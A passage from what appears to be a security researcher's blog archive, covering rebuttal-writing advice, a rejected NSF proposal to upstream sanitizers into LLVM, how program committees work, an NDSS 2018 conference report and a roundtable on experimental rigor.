Now that you are clear about the major (perceived) weaknesses of your paper and after you have identified the main topics that need clarification, it is time to write the actual rebuttal. I like to write the rebuttal based on topics and then highlight which reviewers have raised that topic. Note that at a top tier PC, reviewers have 20-25 papers on their stack and reading 25 rebuttals can be taxing, make it easy for them to identify which parts address their points. Also important: stick to the word limit, many reviewers hate overlong rebuttals and I've seen great rebuttals ignored if they were over (I've also seen rebuttals that were 4x the allowed length). It is good tone to start the rebuttal by thanking the reviewers for their reviews and to highlight any general issues such as that you plan to open source your implementation or to give a quick one sentence introduction into the main topic.

After the initial lead in you can dive into the individual points starting with a quick introduction that summarizes the issue or question and an answer. Try to keep the discussion short. You're not writing a new paper but are clarifying some details. The rebuttal is not the place to introduce new topics but you may mention that you have some additional results or to highlight certain trade-offs.

Generally, keep the tone polite. An aggressive rebuttal will rarely be read to end and is not helpful in convincing the reviewers of your case. Snarky comments or insults are not a good idea either.

When you submit the rebuttal, note that HotCRP sends out an email with the rebuttal to all the reviewers. I've received several rebuttals that were heavily modified and received a couple of updates. It is generally in your interest to only submit the latest version, especially if earlier versions are not yet polished.

Edit

Thanks to Nathan Burow for feedback on the article. I updated the discussion of politics and rephrased the outline construction slightly.

NSF TTP Proposal: Prototype Shepherding

2018-05-13T17:05:00-04:00

After serious advertising of the NSF TTP program at several conferences throughout last year, I've decided to submit to the NSF TTP program last fall. The NSF TTP program is supposed to help transition research into practice, either by forming a company to commercialize a prototype or by developing a full usable implementation of a research prototype.

I thought to have identified a key issue with software security that I wanted to address. At every security conference several papers will propose new mitigations and sanitizers to protect against different forms of attack vectors. These defenses are generally evaluated using some prototype implementation, often on old version of LLVM. Few academic defenses are open sourced and even fewer (none?) are upstreamed or integrated into LLVM itself, most are simply left to bit rot. This poses two problems: usability and maintainability.

First, and most severe, these defenses don't drive the state of security forward and are not usable. While they claim their little space in the academic landscape, they will not be used in practice. To be usable, defenses must be part of the core compiler platform such as LLVM-CFI or the different sanitizers. Developers can use them by simply using a compiler switch.

Second, if open-sourced, they often rely on an old obscure version of LLVM. If the open-sourced prototype can be compiled at all, it will rely on an outdated version of LLVM and may not even be compatible with recent software. For example, compiling Google Chromium generally relies on the most recent head version of LLVM and any older LLVM version will throw errors. Open-sourced prototypes are generally not integrated into the LLVM development platform and therefore will rot away quickly.

These two problems are not necessarily a fault of academia. The job of academics is to provide a reasonable working prototype that shows the feasibility of the system for reasonable software. Providing a complete implementation for any software is usually too complex and upstreaming and maintaining the software forever would incur too much overhead. A graduate student should rather work on the next research problem than on maintaining code. Maintaining code and upstreaming software is not part of the graduate job profile.

The goal of my TTP proposal was to identify high profile mitigations and sanitizers and turn them from research prototypes into usable defenses by integrating them into the LLVM platform and making them available to the general public. Following the idea of LLVM-CFI, the proposed mitigations focused on control-flow hijacking and sanitization focused on type safety -- both important and upcoming areas that have several gaps that need to be filled. For example, while there are three concurrent type safety sanitizer prototypes, none of them has been integrated and upstreamed into LLVM due to the long and difficult upstreaming process.

My thought was that getting sanitizers and mitigations into LLVM was a core achievement that is reasonable in itself as a transition to practice exercise. The upstreaming process takes a lot of time and resources, including from turning a research prototype into a full prototype, testing, code review, and online discussion. Upstreaming makes a defense available to all developers at the flick of a command switch. This by itself vastly increases the impact of a given defense. For the proposal, I identified reasonable mitigations and sanitizers and proposed a plan on how to get them into production. The core of the proposal focused on the upstreaming process and guaranteeing code quality with another part focusing on outreach such as speaking at LLVM developer conferences, hacker conferences, and industry conferences to spread information about the different sanitizers and mitigations -- with the goal of fitting into the existing dissemination process.

Today, I received the reviews and the proposal was ranked low competitive and not funded. The main points against the proposal were (and I quote):

"While the goals of incorporating work into LLVM is certainly worthwhile and potentially high impact, there is no target adopter that is identified in the proposal, nor is there a milestone as to when an early adopter is to be named."
"This is a technically sound proposal, but with a weak transition plan, which is very important in the TTP program."
"The PI emphasized presenting at conferences as a key transition and outreach. From the proposal itself, the PI also notes 'Many developers are not aware of the current research (and do not care)'. These developers are not at key conferences and do not care if they do attend. The proposal should identify some more concrete activities to interact with this community."
"This transition to practice proposal has no supporting letters from any industry collaborators."

The negative reviewers all point towards the lack of industry interaction and want to see both a concrete plan on how to reach out to individual programmers (programmers using LLVM, not the LLVM developers) or industry letters. I consider both of these comments unreasonable. LLVM is an open-source product and therefore steered by the open-source community, industry letters are out of scope. Still, LLVM is the main compiler used for many software systems (Google and Apple use LLVM for all their platforms) and therefore high impact.

In the proposal, I made the point that educating individual programmers (not LLVM developers) was unreasonable as most programmers will not care about security. The proposed approach was to convince LLVM maintainers that the mitigations are reasonable, turning them on by default and thereby protecting the general set of programmers. Reaching out to LLVM maintainers happens at LLVM developer meetings which I proposed to attend.

Orthogonally, the benefit of sanitizers can be emphasized by providing features that help programmers during software development. Tutorials and testing platforms will educate programmers and show them how to use these sanitizers to test their code, thereby increasing security and making them more resilient against attacks.

Overall, I'm a little disappointed at the reviews. The reviewers primarily focused on industry collaboration and commercialization, increasing the security of open-source products, to programmers, and, through indirection, to all software products compiled by LLVM seems to be out of scope for an NSF SaTC transition to practice proposal.

Let me add as a disclaimer that the NSF reviews are generally good, insightful, and deep. The reviewers generally do a great job and the merit based review, while harsh, provides a fair evaluation of the submitted proposals. A challenge for these panels is the alignment and calibration across panels as the dynamic can vastly differ from one panel to another. And, unfortunately, some reviews are sub par. What made me a little sad is that this was the second NSF proposal that was rejected with two very short reviews. I'll include one in it's full length:

A strength is this proposal focuses on mitigations of Control Flow Hijacking
from C or C++ code bases which addresses an area that is vulnerable for many
current attack vectors. A further strength is the proposed further development
of a testing environment using open source.
A strength is that this proposal envisions regular outreach with developer and
compiler communities. A related weakness is a lack of concrete plans for
outreach other than for one international hacker conference. The outreach plan
would benefit from some re-thinking.
Very specifically deals with practices that can easily be taught in
universities. The team may want to explore if there are any synergies with the
Software Assurance Marketplace https://continuousassurance.org.

This reviews has very little useful information. If I received such a review at a conference, I'd complain. I've had several such NSF reviews. Having served on NSF panels myself and serving on lots of program committees, seeing such reviews makes me a little sad. Reviewing is part of the academic job profile. If you are not interested (or able due to other constraints) to do a good job, then decline. But this discussion should be the topic of another blog post.

In the spirit of sharing negative results, I figured that this rejection would be a good example. I thought that the idea, enabling broad usage of academic sanitizers and mitigations, was a great fit for the NSF SaTC TTP as it will increase the security guarantees of our systems at large, indirectly by protecting software compiled with the updated compiler.

The lesson I learned from this TTP proposal is to explicitly state my assumptions. For example, upstreaming into LLVM is a significant achievement that indirectly allows all programmers to profit from new default defense mechanisms. Another point is to clarify the use of open-source software and the development practices used for open-source software. I'll also have to clarify differences between academic conferences where new research is discussed, developer conferences where new features such as sanitizers or mitigations are discussed, and hacker conferences where applied usage of these tools is discussed. NSF draws reviewers from different areas and not everyone will be familiar with these different nuances and terms.

As always, please let me know comments, thoughts, and concerns. I'm always happy to share proposals (both funded and unfunded) given reasonable requests.

The PC Experience

2018-03-03T19:03:00-05:00

Program Committee (PC) meetings are this mysterious event where the fate of our research projects is decided based on a review of our paper submission. Especially for beginning researchers (i.e., PhD students) it is unclear how the evaluation and review process actually works. From a student's perspective, a paper is -- in systems or security in computer science -- generally submitted to a conference after experiments and writing are completed. How to efficiently focus on design, implementation, evaluation, and writing of a paper is not straight forward and is worth a couple of other blog posts. While others have discussed how to review a paper, the discussion process on how papers are evaluated to build a conference program are somewhat opaque. This blog post tries to shed some light on this process and the work of the PC committee with some hints what the PC chair does. The target audience are PhD students that want to understand the process and the post is written from the viewpoint of a junior researcher that is selected to be on a conference PC for the first time.

PC selection

The PC chair (or chairs) is usually selected by the conference steering committee. The chair and the steering committee then come up with a list of potential PC members. To ensure that all topics and areas in the call for papers are well covered, the list of PC members should be balanced according to individual strengths and foci of the different PC members. The call for papers is usually based on last years edition with tweaks regarding topics based on changes in the community to adapt to new topics and changes in existing topics.

After adding enough candidates to the PC pool, the candidates are ranked based on different criteria such as (i) if they have served before, (ii) if they are well known in the community/do they publish at the same conferences, (iii) if they write reasonable reviews, and (iv) conference and committee politics. Depending on the prestige of the conference and how well a chair can bully their friends into serving (and the tone of the invitation email), more or less people will agree to serve on the PC. The declined invitations can be filled with people further down on the list in the same area to ensure good topic coverage.

The selection process continues until enough people have agreed to be on the PC. The chair or steering committee (or web chair) publishes the list of PC members, starts advertising the conference, and asks the PC members to advertise and sometimes to submit papers as well.

Another administrative task is the selection of the submission system. While there are several systems, some are more or less friendly to the reviewers. All have different advantages and disadvantages. My personal favorite is HotCRP which can either be used in its self-hosted open-source version or in the fairly costly hosted version (where the conference pays for each submitted paper). Alternatives are, e.g., EasyChair or OpenConf.

Paper bidding

After the submission deadline has passed and all the papers are in the system, the chairs generally work through all the papers to remove any papers that violate format guidelines or are only half submitted. Afterwards PC members are asked to bid for papers they want to review. In rare cases, the PC chair directly assigns papers to reviewers, but this is less common.

Remember when, as an author, you select from a list of topics to submit a paper. These topics allow a coarse selection based on interests. PC members similarly mark their interests from the same list. On HotCRP, PC members signal from strong interest to strong disinterest on a per-topic basis. These topic-based interests are then used for an initial ranking of the papers. If a PC member forgets to bid for papers, this selection can be used as a crude proxy to make a selection.

As you'll be entering preferences, try to consider how likely you want to review the paper. Read the abstract, title, and keywords. Does this sound like a fun and interesting paper in your area? Then go ahead and mark your interest. PC members are asked to enter a bid between -20 and +20 to show disinterest or interest to rank each individual paper. The bids are then normalized over all reviewers. A special mark (-100) is often used to highlight a potential forgotten conflict.

The long list of papers can be daunting. All papers that have a topic score above 0 should could be interesting and you should at least check the title and abstract. With lower topic scores, the chances are less likely that you will enjoy reviewing the paper. When entering bids, I follow the strategy to sort papers based on the topic ranking from most to least interesting, displaying a detailed view with titles and abstracts. After going through all papers, I always sort the papers based on my bids to check the top papers again. Those are the papers most likely to end up in my review pile. Additionally, I often search for keywords that I know are interesting for me to ensure that I did not forget to bid for a particular paper. Think of this as a whitelist that you want to check for (I don't have a blacklist at the moment).

After the end of the bidding phase, the PC chair assigns papers to individual PC members, often in an automatic or semi-automatic way to reduce the amount of reviewer pain and to maximize expertise for each paper. The reviewing systems often provide several metrics and interfaces to carefully select and balance reviewer workload, interests, and a fair set of reviewers per paper. Not each paper will get a perfect set of reviewers. Sometimes there are papers with no bids and it is up to the discretion of the PC chair to select a lucky PC member to review that paper. Not every PC member only gets their favourite papers to review. The selection process explains some of the low expertise reviews. Two alternate options are that some PC members may not bid for papers or they misjudge their expertise in a paper.

Both as an author and a reviewer it is super important to not underestimate the topic selection and bidding process. As an author, you set the tone of the paper by providing a good set of topics that allows the reviewers to quickly assess the generic area of your paper and the contributions of your paper. As a reviewer, with the topic selection you can decide what papers you want to focus on when making your bid. It's a great idea to spend the majority of your bidding selection time on papers you would want to review. For your bidding, you then need to make sure that these are papers that are interesting to you. You will spend quite some time reading the papers and writing the reviews, so it should also be fun!

Reviewing

Reviewing is an art in itself and has been covered by several blog posts, classes, or even technical reports. I personally follow the strategy to skim the paper from beginning to end to get an overview, then read the paper to keep detailed notes. My review is then often split into summary, list of strengths, list of weaknesses, general comments, writing issues, and questions to the authors. An important aspect is the discussion of novelty and how the paper relates to existing work. If you think something is not novel, always make sure to give references. The tone of the review is also important. Reviews are blind and a one-way communication. Authors cannot respond to reviews and as a reviewer it is your job to provide context and as much information to help the author improve their paper. Aggressive, angry, or insulting reviews are not helpful in the review process. Stay friendly and helpful.

When entering scores for the papers make sure to normalize over the batch of papers that you have received as this will allow some initial assessment of your batch. Note that it is statistically highly unlikely that it's always you who gets the worst batch of papers. Don't try to kill papers, stay positive. Search for novel nuggets and contributions that make a paper worthy of acceptance.

PC meeting

PC meetings are either online or offline. At the PC meeting, the reviewers argue about acceptance or rejection of each submitted paper, orchestrated by the PC chair. Online PC meetings often use the discussion feature of the reviewing system. The reviewers of the paper add comments and discuss pros and cons. Stay active and involved in the papers you reviewed and make sure to follow up on questions from other reviewers and try to defend the papers you want to argue for. Bring factual arguments about the novelty or why you think the paper should be accepted.

If the PC meeting is onsite, be prepared for some extra fun. An onsite PC meeting is usually 1-2 days and heavily orchestrated by the PC chair. The first task for the chair is to decide the discussion order, i.e., in what sequence papers will be discussed. There are several strategies with different advantages and disadvantages. Some of the more common ones are: (i) random order to keep reviewers arguing close to a baseline, (ii) front load good papers to set the tone, with the potential drawback that the discussion turns negative as "too many papers have already been accepted", (iii) front load bad papers, or (iv) minimize conflicts. Conflicted reviewers have to leave the room if a conflicted paper is discussed. This can delay the discussion due to shuffling people around and fetching them back into the room.

Independent of the order, some or all papers will be discussed and each discussed paper receives a slot of a couple of minutes. The discussion lead first summarizes the paper and the highlights in the reviews. The merit of the paper is then discussed by all the reviewers. The PC chair often slightly steers the discussion so that it stays on track and may table the discussion if it takes too long, coming back to the paper later. If the reviewers cannot agree if the paper should be accepted or not, other PC members can chime in and, finally, vote on the merit of the paper.

One aspect that is getting increasingly common is to add a note of the PC discussion to the reviews which allows the authors to better understand what aspects were discussed during the meeting and what the reviewers think should be changed or what they liked.

Especially as a junior person, an important aspect of the onsite PC meeting is networking. PC meetings are an awesome opportunity to discuss research questions with senior colleagues or to get to know other people in the wider field. If you can, take part of the onsite PC meeting even if it involves travel. It's usually more compact than a conference and you get much more face time with your colleagues.

Student PC

Student PCs are a somewhat modern approach to allow senior students to experience a mock PC. The student PC reviews the same (or sometimes a slightly smaller) set of papers in a realistic setting as possible. Such PCs are often a great way to get to know other academics and to network with your peer students. The trade-off is the amount of work and the additional travel that takes some time of your schedule compared to working on your next research project.

Case study: a local dry-run

Student PCs may sometimes be too high a burden with additional travel and especially for junior students the total overhead may not be worth it. To allow my students to experience and understand the PC environment, we have conducted a mock Usenix Security PC last week. After receiving my batch of Usenix Security papers, I played the role of PC chair and assigned my interested students a set of papers to review. Orthogonally, I have reviewed all the papers myself, to act as a discussion partner during the mock PC meeting. We then shared all the reviews to prepare for an onsite discussion. Similar to a real PC meeting, we had lots of caffeinated drinks and sugery food to stay sharp.

During our half-day PC meeting we worked through the set of papers, following a random strategy. The students were the discussion leads as we discussed each paper. When writing reviews, students often go through an interesting development: at the beginning of their research career, they are overly positive (this is the best paper I've ever seen) without considering related work. With some research experience, they become overly negative (everything has been done before), until they start to normalize and become more practiced in their reviewing skills.

For each paper, we discussed strengths and weaknesses and worked on either accepting or rejecting it. In the end we came up with a set of 5 out of 12 papers that were at least slightly positive to advance to the next round and likely 3 that would have been accepted. Not bad for a first PC meeting. After we finished the discussion, I went through all the reviews again and adjusted some of my reviews and scores. This exercise was also worthwhile for me and helped me improve my reviews as well.

A note on conflicts of interest: handling conflicts is hard! I ensured that only my primary advisees were reviewing the papers. As they share my conflicts and my conflicts are a superset of theirs, this mitigates the risk of unhandled conflicts.

Conclusion

PC meetings are somewhat opaque to students. We as a community should allow students who are responsible to carry the main load of most research projects to better understand the review process. With understanding comes deeper insight that allows optimization of the process. Students that understand how a paper is reviewed by a PC member will start to write better papers -- highlighting the strengths and novelties of the paper while clearly discussing the limitations.

I hope this short summary is useful to new students. A tricky question when conducting such mock PCs are conflict of interest. As a PC member, the group leader is responsible for all the reviews and should write the reviews themselves. Orthogonally, students profit drastically from the experience of reviewing papers. Until they are invited into PCs themselves or are senior enough to become (rare) subreviewers, my opinion is that such mock PCs are a great way to train our students.

I always encourage comments and feedback. Let me know what you think, if your opinion on an aspect of the review process differs, what I missed, or what we can improve for the next mock PC!

Raising the BAR at NDSS 2018

2018-02-21T14:03:00-05:00

Just like every year, this year's NDSS was mid February in sunny (but not too warm) San Diego. To help cure the minimal 3 hour jetlag, I enjoyed a couple of morning runs with some of my colleagues -- if you want to get a workout done at a security conference, just let me know and join us! The paper selection this year was great, just as usual. The keynote talks were amazing, more on this later as well. During the opening notes, Alina Oprea and Patrick Treynor commented on how to improve the reviewing process. One thing that changed this year was that we had a set of workshops on the day before the conference.

The workshops were vastly extended compared to prior years. Yours truly and Matthew Smith served as workshop chairs. Compared to the last years we broadly searched for new workshops and poached different people to submit new and exciting workshop proposals. In the end we received seven great workshop submissions out of which we were able to accept four due to space constraints. The workshop I was most looking forward too was the BAR (Workshop on Binary Analysis Research) as it highly overlapped my research interests.

The Workshop on Binary Analysis Research (BAR)

Due to a flight delay I missed the first half of the workshop day and only sneaked in shortly before lunch. The keynote, as I heard, was amazing. Brendan Dolan-Gavitt discussed Prospects and Pitfalls for a Science of Binary Analysis. Binary analysis is in a renaissance. Since the DARPA Cyber Grand Challenge a lot of new research in binary analysis has sprung up, greatly increasing the precision and scaling approaches to larger and more realistic binaries.

Brendan lamented the absence of versatile datasets. In other areas, such as image recognition, representative datasets have helped push towards ever increasing progress. Effective datasets must be curated and tailored to a problem. Interestingly, in system security research we often primarily use a set of standard benchmarks to measure CPU and compiler performance (SPEC CPU2006). This set of benchmarks has nothing to do with security. We need datasets to test bug finding tools but also malware analysis tools.

For bug finding, the DARPA CGC and LAVA datasets have changed the status quo somehow and tools are finding more and more vulnerabilities in those benchmarks. Both of these benchmarks are somewhat artificial, either with injected bugs or with bugs that programmers purposefully placed. The best bug finding tools now already find a large percentage of the synthetic bugs, so we'll soon have to develop new datasets. Datasets for malware analysis have the problem that there is no ground truth. It is somewhat dubious if a dataset is representative as malware campaigns quickly change to react to new malware detection mechanisms.

Binary analysis tasks may be hard and we don't know yet how helpful machine learning will be as the datasets are hard to understand. As a common pitfall, Brendan mentioned that coreutils binaries share up to 94% of code. Machine learning approaches therefore will have a hard time to split the programs into train and test datasets, resulting in over-fitting. The evaluation will test based on the training set, skewing results.

The point Brendan tries to make here is that it's hard to assess a datasets validity. I.e., given a dataset is it representative of the status quo, the hard problems, and the current trends? Large, well-labeled public datasets are crucial to progress in binary analysis. While we have made some progress in the past, the road ahead is long and we will need to constantly improve our datasets. As a community we can together work on this problem.

In the afternoon, the Evolving Exact Decompilation talk by Matt from GrammaTech was very impressive. The idea is simple yet super effective: leverage a genetic optimization algorithm to infer source code from a binary. Start with a simple skeleton, extract strings and constants from the binary, then drive a genetic algorithm to compile the binary to byte equivalent code. The optimization function is simply the edit distance to the source binary. This approach worked surprisingly well for smallish binaries. I do recommend reading the paper.

The paper sessions were followed by a real round table -- great job at moving all those desks and chairs around! The round table focused on the present and near future of binary analysis tooling. We discussed topics such as developments of inter-changeable data formats. Using a common IR seemed to be out of the question, mostly as many groups have already invested a lot of effort into developing their own IRs, highly optimized for their use cases. But developing a data interchange format similar to the CNF format used in SAT solvers may be feasible. CNF is at this interesting intersection where the format far from the internal representation that solvers use but transformable to all formats without loss of generalization. Other topics were datasets, remarks based on Brendan's keynote, open-sourcing, and reproducibility of results. Yan and Fish, the workshop chairs, promised to write a longer blog post about the round table and I'm looking forward to that!

Beyond Smarts: Toward Correct, Private, Data-Rich Smart Contracts

Ari Juels gave an inspiring keynote on blockchains and smart contracts. His idea was to implement a verifiable bug bounty program on top of Hydra, their system of a dynamic correct private smart contract system that combines the advantages of SGX and smart contracts. Hydra combines smart contracts in the block chain with SGX, SGX provides fast computation, integrity but no availability while smart contracts provide the necessary availability. As an outside I found the idea compelling as it would simplify the computation required in a contract somewhat. We had long discussions during the coffee break about the keynote, which is exactly what a keynote should inspire you to.

The Long Winding Road from Idea to Impact in Web Security

Parisa Tabriz, the self-proclaimed browser boss and security princess talked about challenges in securing large browsers. After the dust of the publication settles, there's still a long road to getting a proposed defense or mitigation into a mainline browser. This road involves a lot of engineering, policy changes, and discussions at all levels of abstraction. Having a research idea and simply showing an implementation prototype is not enough! The talk focused on three major thrusts to improve browser security: retiring Adobe Flash, https as default, and per-iframe isolation.

Flash was at fault for the majority of exploitable bugs in Google Chrome. Since 2005 there were more than 1,000 vulnerabilities with assigned CVE numbers. This is a low bar of all bugs as not all bugs get a CVE. Simply removing flash was not an option as people expect the web to just work, a browser must render legacy and broken content. The long road to remove flash consisted of a thousand little changes. First, they bundled Flash to increase user convenience which enabled Google to push auto updates. Second, they added mitigations to quickly disable plugins and whitelist plugin usage on a per-domain basis. Third, they started fuzzing flash based on a large corpus (being a search company kind of helps finding a large set of flash files). The fuzzing on 2,000 cores resulted in 400 unique crashes and 106 0-days. Fourth, they introduced bug bounties for Flash bugs. Fifth, they sandboxed flash through PPAPI. Sixth, they started pushing HTML. Seventh, they moved YouTube to HTML5. Eight, Flash now requires click-to-play. Ninth, HTML5 becomes the new default. Tenth, Flash End-Of-Life is set to 2020. Lessons learned: (i) Flash was Google's problem too, despite being made by another company; (ii) dumb fuzzing works great; (iii) incident response instigated better architecture; (iv) an ecosystem change takes time.

HTTPS should be the default and HTTP should be marked as not secure. The initial symbols for the connection status were good (https, valid certificate), dubious, and bad depending on the error status. The new set of symbols simply uses a green lock for a protected connection and a red open lock to signal any error. This branch of work is based on research by Adrienne Porter Felt. Challenges to push for the adoption of those changes were based on (i) motivation (why should we move to HTTPS if HTTP works just fine); (ii) revenue and performance risks as HTTPS may increase the CPU time; and (iii) third party dependencies as some JavaScript libraries did not support https transports. An interesting orthogonal problem were cultural quirks: in Japan, small companies started to adopt HTTPS based on shame only after a big mover could be convinced (i.e., it was embarrassing not to have HTTPS after the big player adopted HTTPS). Lessons learned: (i) Google needed a business case for change; (ii) research was critical to make changes; (iii) ecosystem change takes time; (iv) conspiracy theories are abound!

Individual iframes should be isolated from each other. Let's use Chrome's sandbox to isolate them! This challenge ultimately turned into a refactoring project for Google Chrome. The renderer enforces same-origin policy, if the renderer is compromised then the same-origin policy can be broken. Originally Chrome used WebKit as renderer but the continuing changes were too drastic, so Chrome forked WebKit into Blink in 2013. The overall goal is to run the evil.com iframe in a different renderer process than the good.com website (which loads evil.com). As a side note, Spectre/Meltdown can read anything from its address space. Per-site process is perfect mitigation for such issues. Google Chrome is moving to full per-site isolation to protect individual frames. Lessons learned: (i) redesigning an engine in flight takes longer; (ii) details really matter; (iii) research can be prioritized; (iv) defense in depth pays off.

Overall, this was the best keynote I've seen in a long time and I thoroughly enjoyed the deep discussions and details Parisa provided. If you have spare time, check out the Chromium Security page and I hope that the recording of the keynote will become available!

Paper Highlights

The NDSS conference was obviously not just about keynotes but also had great research paper sessions. I was a little too slow to be session chair as, when I replied to the email asking for chairs, all the sessions in my area were already covered.

The first session contained a great set of IoT fuzzing papers. In IoTFuzzer: Discovering Memory Corruptions in IoT Through App-based Fuzzing, Jiongyi Chen, Wenrui Diao, Qingchuan Zhao, Chaoshun Zuo, Zhiqiang Lin, XiaoFeng Wang, Wing Cheong Lau, Menghan Sun, Ronghai Yang, and Kehuan Zhang extract data from Android controller applications to generate a fuzzing corpus. Later in What You Corrupt Is Not What You Crash: Challenges in Fuzzing Embedded Devices, Marius Muench, Jan Stijohann, Frank Kargl, Aurelien Francillon, and Davide Balzarotti leverage different signals to test what the underlying reason for a bug is, e.g., TCP connection reset to infer internal state of the embedded device when fuzzing it.

The session software attacks and secure architectures contained with another set of interesting papers. In KeyDrown: Eliminating Software-Based Keystroke Timing Side-Channel Attacks Michael Schwarz, Moritz Lipp, Daniel Gruss, Samuel Weiser, Clémentine Maurice, Raphael Spreitzer, and Stefan Mangard discuss how interrupt timing channels allow inference of key presses. They propose to add random interrupts to mitigate this side channel. In Securing Real-Time Microcontroller Systems through Customized Memory View Switching Chung Hwan Kim, Taegyu Kim, Hongjun Choi, Zhongshu Gu, Byoungyoung Lee, Xiangyu Zhang, and Dongyan Xu encapsulate safe area in microcontroller to protect parts of critical functionality and to detect/mitigate attacks. The encapsulation mechanism has very low performance and memory overhead but requires some manual instrumentation. Later in Tipped Off by Your Memory Allocator: Device-Wide User Activity Sequencing from Android Memory Images by Rohit Bhatia, Brendan Saltaformaggio, Seung Jei Yang, Aisha Ali-Gombe, Xiangyu Zhang, Dongyan Xu, and Golden G. Richard III leverage Android memory images to recover allocation sequences and application details.

Out of obvious reasons, the software security session was the most interesting one -- this was the session for our HexHive paper and my favorite other paper. First, K-Miner: Uncovering Memory Corruption in Linux by David Gens, Simon Schmitt, Lucas Davi, and Ahmad-Reza Sadeghi propose an extensible full-kernel static analysis system and evaluate it by searching the kernel for memory safety violation. The impressing fact is that the LLVM-based framework scales to the full Linux kernel. Second, CFIXX: Object Type Integrity for C++ by Nathan Burow, Derrick McKee, Scott A. Carr, and Mathias Payer introduces Object Type Integrity, a new security policy that protects vtable pointers for C++ applications against adversary-controlled writes. C++ objects may only be created by legit program flow through a constructor call. Virtual dispatch is adjusted to leverage the protected vtable pointers, thereby guarding control flow. You should obviously read both paper and start with the CFIXX paper!

The paper Superset Disassembly: Statically Rewriting x86 Binaries Without Heuristics by Erik Baumann, Zhiqiang Lin, and Kevin Hamlen proposes a static reassembler that leverages the concepts of dynamic binary translation. The retranslator builds on a set of of assumptions and ideas: First, keep data static and constant, assume that references to data remain fine. Second, create mapping from old addresses to new addresses (similar to dynamic BTs). Third, rewrite all executable data to differentiate code from data. Fourth, rewrite all libraries to cover all executable code. The performance and memory overhead is still a little on the high side but the idea is interesting

An honorable mention goes to the two interesting web security talks JavaScript Zero: Real JavaScript and Zero Side-Channel Attacks and Riding out DOMsday: Towards Detecting and Preventing DOM Cross-Site Scripting.

Roundtable on rigor in experimentation

2017-08-14T17:52:00-04:00

This year at CSET yours truly had the pleasure to organize a round table on rigor in experimentation with Geoff Voelker, Micah Sherr, and Adam Doupé as panelists. After a quick introduction and mission statements we discussed rigor in experimentation along several dimensions. The most interesting aspects were open source in academia and maintenance of code, design of experiments and comparison to other sciences, published results and reproducibility, and how defining metrics for security is hard.

Geoff Voelker is well known for focus on computer systems networking and network security with both experimental and empirical research. Two aspects of his research include challenging internet-wide experiments and measuring volatile data. During his mission statement he discussed the problem of reproducing own results and that computer science research labs need to develop strategies and guidelines for experiments, including detailed lab notes and exact details of how benchmarks are run. He included the anecdote that some of his papers include individual SQL queries used to generate specific graphs and data, thereby documenting the required resources. Students must label, backup, log, and detail all their results. Whenever a student produces a graph and brings it to a discussion, he encourages the students to challenge the validity of the data which helped find programming errors on several occasions. Another important lesson that he teaches students is the difficulty of correctly setting up an experiment. New students must first reproduce an existing experiment and during this process they learn how easy it is to make mistakes. As they know how the data should look like, it is easier to spot mistakes and improve in the process.

Adam Doupé's research is centered around web security and he automated tools to discover web vulnerabilities and infer bugs. Through measuring the effectiveness of web vulnerability scanners he developed metrics to compare different tools and analyzed their weaknesses. Building on this framework he looked into developing defenses against server-side vulnerabilities. He is best known for playing with shellphish and leveraging capture-the-flag hacking games to educate security students. Many of the prototypes of his work are on GitHub. In his mission statement, Adam brought up the importance of reproducibility. As a community (and inside each research group) we need to push towards making our research reproducible. Open-source and sharing data sets are crucial requirements for reproducibility. He brought up a point that it may not always be possible to open-source prototypes, especially for companies that have business interests in a given prototype.

Micah Sherr focuses on privacy-preserving technology, e-voting security, eavesdropping, and wiretapping. He self-described likes to break stuff and fix things. In the past, he worked on creating testbeds for Tor, systematizing challenges in security research for cyber physical systems, and measurement experiments. In his statement, Micah brought up challenges in incentives in the publication process. To publish a paper, a prototype needs to be improved until its performance (according to whatever metric) surpasses the performance of the prior system. Whenever the prototype improves upon the related work, the process stops and the results are published. An interesting challenge is the difference between rigor and quality. While quality addresses how to handle insufficient work, rigor defines how to do good science. Students must be rigorous in analyzing results and reproducibility may not be an inherent criterion or requirement for good science (or not even possible in certain cases).

After the mission statement we branched into the discussion of different topics with lively interaction of the audience. Most prominent was the discussion about open-source and if open-source should be a requirement for publication. Open-source is the first step towards reproducibility. As a precondition it must be satisfied but open-source alone does not inherently allow reproducibility or even repeatability. Reproducibility comes in different flavors. If the benchmarks can be rerun with the same code and the same data, the experiment can be repeated. Full reproducibility requires reimplementing the system according to the description in the paper and running it both on the same and additional data to ensure that the system did not just cover a small hand-crafted set of examples. If the code is well documented, results may be repeated, reproducibility requires a lot of additional legwork.

If source code is released at all, the quality may not be stellar. Students often write their prototypes under time pressure and as soon as the benchmarks run, development stops. Interestingly, the last commit of open-source research prototypes often aligns with the publication date of the paper. An interesting discussion point was that the open-source prototype should be consumed as-is. While the authors may help with documentation and some requests, it is not the responsibility of the authors to maintain the code and port it to other systems. Maintainability is the job of the code consumers, other researchers who try to replicate the results have to address portability. Note that it is always a nice gesture and good tone to help wherever you can, but it is not an obligation. Open-source research prototypes should not be considered production ready.

Artifact evaluation goes along with reproducibility and may be an interesting complementary aspect. Program committees start to include more and more artifact evaluations. Papers with accompanying artifacts that are successfully evaluated (usually by graduate students who build the prototype and repeat the results in a couple of hours) receive an artifact evaluation award or badge. Such badges may be used as incentives for authors to open-source their prototypes as it shows that the results in the paper can at least be repeated.

The last topic was responsible disclosure and legal aspects of security research. While responsible disclosure (letting software or hardware vendors privately know about any discovered vulnerabilities and giving them time to patch them) is well accepted in the community, adversarial research may still be controversial. Open-sourced adversarial research, e.g., in bug finding tools or exploitation tools may lead to legal issues as these tools could be classified as weapons. As these legal frameworks are being developed, security researchers must be aware of such possible pitfalls.

Overall we had a great time discussing these different aspects of rigor in security research. Although we talked for an hour, time went by very quickly and we agreed that we could have continued to talk for a couple more hours! The audience joined in on the discussion and we were happy with all the great questions. Thanks to the great panelists, we had a wide range of expertise and I believe that the audience enjoyed our chat.

Mitigations: Completeness/Effectiveness vs Performance

2017-07-07T09:38:00-04:00

As part of ESSoS ‘17 we have organized a joint ESSoS/DIMVA panel on exploit mitigations, discussing the past, present, and future of mitigations. If we look at the statistics of reported memory corruptions we see an upward trend in number of reported vulnerabilities. Given the success of contests such as pwn2own one might conclude that mitigations have not been effective while in fact, exploitation has become much harder and costly through the development of mitigations.

